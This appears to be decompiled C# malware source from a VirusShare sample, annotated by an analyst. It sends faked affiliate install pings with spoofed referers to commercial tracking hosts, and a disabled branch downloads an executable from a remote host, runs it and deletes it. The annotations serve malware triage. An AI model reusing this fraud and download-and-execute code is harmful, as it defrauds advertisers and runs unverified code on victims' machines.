// Decompiled with JetBrains decompiler
// Type: AffiliateExecuterNoWin.Program
// Assembly: WolfFt, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 510BEE3B-1B9B-4B2D-9942-86D11904E770
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Net-Worm.Win32.Mytob.lnt-bef6a2117211c906156a30c3f707a4cf4d485846cbcd1b241053651b23028a95.exe

using HTTPAgent;
using Microsoft.Win32;
using System;
using System.Collections;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Reflection;
using System.Text.RegularExpressions;
using System.Windows.Forms;

namespace AffiliateExecuterNoWin
{
  // Analyst note: entry-point class of the decompiled sample named in the header above.
  // All network activity in Main goes through Agent and DataExtractor, which are not
  // defined in this view (Agent presumably comes from the HTTPAgent namespace), so
  // statements about what those helpers do are inferred from the call sites only.
  internal static class Program
  {
    // Assigned once in Main; not read anywhere in the part of the file visible here.
    private static string trackerUrlAndVersion;

    /// <summary>
    /// Drives a fixed sequence of HTTP requests through <c>Agent</c> (theme-selection,
    /// "install_redirect", "exit_file", "installed" and pixel URLs) while setting
    /// <c>agent.Referer</c> by hand between requests. Only when <c>flag2</c> is true does it
    /// go on to fetch an executable, start it with the argument "/s", wait for it and delete it.
    /// </summary>
    /// <remarks>
    /// In this build <c>flag1</c> and <c>flag2</c> are both hard-coded to false, so the
    /// per-IP run-once branch and the download-and-execute tail are never reached.
    /// The namespace name and the "cpa_pixels" / "pixel.track" URLs are consistent with
    /// affiliate install-credit fraud; that classification is an inference from the strings,
    /// not something the code states.
    /// For triage, the host names in the string literals below are the network indicators
    /// this method exposes; the only host-side artefacts are confined to the flag2 branch.
    /// </remarks>
    /// <param name="args">Command-line arguments; never read in this method.</param>
    [STAThread]
    private static void Main(string[] args)
    {
      // Value applied to agent.Referer before the first request below.
      string str1 = "http://coolfbskins.info/getitnow";
      // Key passed to GetSavedIPs/SetSavedIPs (defined outside this view; the
      // Microsoft.Win32 import suggests registry storage, unconfirmed).
      string appName = "hazidtacp";
      // Hard-coded off: the per-IP run-once check below is dead code in this build.
      bool flag1 = false;
      // Only used inside the flag1 branch, as the page the public IP is scraped from.
      string URL = "http://whatismyipaddress.com/";
      // Hard-coded off: the download-and-execute tail of Main is dead code in this build.
      bool flag2 = false;
      // File name of the executable and the plain-HTTP URL it would be fetched from.
      string str2 = "gamewrangler_v2.exe";
      string url1 = "http://ie-organic.conduit-download.com/77/295/CT2956077/Downloads/IE/Releases/6.3.5.3/11-04-20-11.19.22.106/" + str2;
      Program.trackerUrlAndVersion = "http://www.google-analytics.com/__utm.gif?utmwv=4.9.2";
      // Expiry check: returns only once the local clock is past 3000-01-01, so it never
      // fires in practice. NOTE(review): looks like a kill date left at a placeholder value.
      if (new DateTime(3000, 1, 1) < DateTime.Now)
        return;
      Agent agent = new Agent();
      // Opaque helper; presumably sets browser-like request headers. Confirm in HTTPAgent.
      agent.EmulateBrowser();
      if (flag1)
      {
        // Takes the first dotted-quad found in the response, exits if that string already
        // occurs in the saved list, otherwise appends it followed by ';'.
        // The [0] index is unguarded; what happens when nothing matches depends on what
        // ExtractDataArray returns (not visible here).
        string data = DataExtractor.ExtractDataArray(agent.GetURL(URL), "(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\b)", "$1")[0];
        string savedIps = Program.GetSavedIPs(appName);
        if (savedIps.IndexOf(data) >= 0)
          return;
        Program.SetSavedIPs(appName, savedIps + data + ";");
      }
      if (!string.IsNullOrEmpty(str1))
        agent.Referer = str1;
      // Follows a script redirect: pulls the window.location target out of the first
      // response and requests it. Same unguarded [0] index as above.
      string data1 = DataExtractor.ExtractDataArray(agent.GetURL("http://bsitm3.com/?a=18003&c=140&s1="), "window.location=\"([^\"]+)", "$1")[0];
      agent.GetURL(data1);
      // Never read afterwards in this method.
      string referer = agent.Referer;
      agent.GetURL("http://www.facetheme.com/setTheme.php?skinid=100087&redir=http%3A%2F%2Fwww.facetheme.com%2Fdownload%2F");
      agent.GetURL("http://app.adurr.com/fb/setTheme.php?skinid=100087&redir=http://www.facetheme.com/download/");
      // Referer is blanked before the install-related requests.
      agent.Referer = "";
      agent.GetURL("http://www.facetheme.com/install_redirect.php");
      // Fresh random GUID, upper-cased, sent as the install id. Nothing has been installed
      // or executed by this method at this point, so the "exit_file" and "installed"
      // requests report an install that did not happen on this code path.
      string upper = Guid.NewGuid().ToString().ToUpper();
      agent.GetURL("http://www.facetheme.com/exit_file.php?installid={" + upper + "}&version=1.0.0");
      agent.GetURL("http://www.facetheme.com/installed/{" + upper + "}/1.0.0/");
      agent.GetURL("http://www.facetheme.com/cpa_pixels/nvb.php?cid=us&pid=ft");
      agent.GetURL("http://pqsar.com/javascript/8001.js?action=12560");
      // Referer is set to the pixel page so the next requests appear to originate from it.
      agent.Referer = "http://www.facetheme.com/cpa_pixels/nvb.php?cid=us&pid=ft";
      // The response body is handed to GetRecursivePixels, whose body is cut off in this view.
      string url2 = agent.GetURL("http://www.tracklead.net/pixel.track?CID=144152&MerchantReferenceID=");
      Program.GetRecursivePixels(agent, url2);
      agent.Referer = "http://www.facetheme.com/cpa_pixels/nvb.php?cid=us&pid=ft";
      agent.GetURL("http://pqsar.com/pixel/?o=8001&action=12560");
      // Always returns here in this build, because flag2 is false.
      if (!flag2)
        return;
      // Target path: the Public Documents folder when it exists, otherwise the bare file name.
      if (Directory.Exists("C:\\Users\\Public\\Documents\\"))
        str2 = "C:\\Users\\Public\\Documents\\" + str2;
      // Presumably saves url1 to str2 (helper not visible). The URL is http:// and no hash
      // or signature check on the file is visible before it is started.
      agent.getURL2File(url1, str2);
      try
      {
        // Starts the fetched file with "/s", blocks until it exits, then deletes it.
        // Hunting pivot: a process created from the Public Documents folder with "/s"
        // whose image file is removed right after exit.
        Process.Start(str2, "/s").WaitForExit();
        System.IO.File.Delete(str2);
      }
      catch
      {
        // Every exception is swallowed, so a failed start or delete is silent.
      }
    }

    private static void GetRecursivePixels(Agent agent, string html)
    {
      html = Regex.Replace(html, "", "");
      List stringList = new List();
      stringList.AddRange((IEnumerable) DataExtractor.ExtractDataArray(html, "pt src=\" ?([^\"]+)", "$1"));
      stringList.AddRange((IEnumerable) DataExtractor.ExtractDataArray(html, "